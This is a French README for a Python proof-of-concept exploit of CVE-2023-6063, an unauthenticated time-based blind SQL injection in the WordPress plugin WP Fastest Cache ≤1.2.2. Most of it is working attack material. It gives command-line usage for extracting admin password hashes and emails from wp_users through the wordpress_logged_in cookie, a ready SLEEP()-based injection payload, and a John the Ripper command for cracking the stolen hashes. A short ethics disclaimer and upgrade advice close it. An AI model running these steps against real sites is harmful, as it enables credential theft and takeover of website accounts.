
Une preuve de concept pour CVE-2023-6063, une vulnérabilité d'injection SQL aveugle basée sur le temps dans WP Fastest Cache ≤1.2.2.
Une preuve de concept pour CVE-2023-6063, une vulnérabilité d'injection SQL aveugle basée sur le temps dans WP Fastest Cache ≤1.2.2. Extrait les mots de passe hachés (user_pass) et les e-mails (user_email) de la table wp_users en abusant du cookie wordpress_logged_in.
Ce script extrait :
Installer les dépendances (si elles ne sont pas installées) :
pip install -r requirements.txt
Utilisation de base :
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5
Options complètes :
-h, --help show this help message and exit
-u URL, --url URL Full URL to Wordpress for testing CVE-2023-6063
--username USERNAME Define a user to extract its hashed pass
-d DELAY, --delay DELAY
Time for wait web response default 5, minimum 2
-H HASH, --hash HASH Hash to verify against wp_users table, if the hash contains specials characters, please use single quotes -> '<hash>'
--domain DOMAIN Name of the domain for email validation
-c COOKIE, --cookie COOKIE
Specify a cookie name if it's different on your context
--status-code STATUS_CODE
Use a specific positive status code, default 200
--debug More verbosity
--just-hash Just extract hashed password
--just-email Just extract email value for a user
Ceci est une démo pour l'utilisateur admin
https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890
Lorsque les hachages de mots de passe sont divulgués, utilisez john ou hashcat pour les déchiffrer avec l'algorithme PHPass si le mot de passe est vulnérable.
Exemple avec John :
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass
Le plugin WP Fastest Cache (≤1.2.2) pour WordPress est vulnérable à une injection SQL aveugle non authentifiée via le cookie wordpress_logged_in. Les attaquants peuvent exploiter cette faille pour extraire des données sensibles (par exemple, hachages de mots de passe, adresses e-mail) de la table wp_users en utilisant des délais basés sur le temps (SLEEP()) dans les requêtes SQL.
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -
🚨 Avertissement : Utilisez ces informations uniquement pour des tests de sécurité éthiques avec une autorisation appropriée. L'exploitation non autorisée est illégale.
Mettez à niveau WP Fastest Cache vers une version >1.2.2.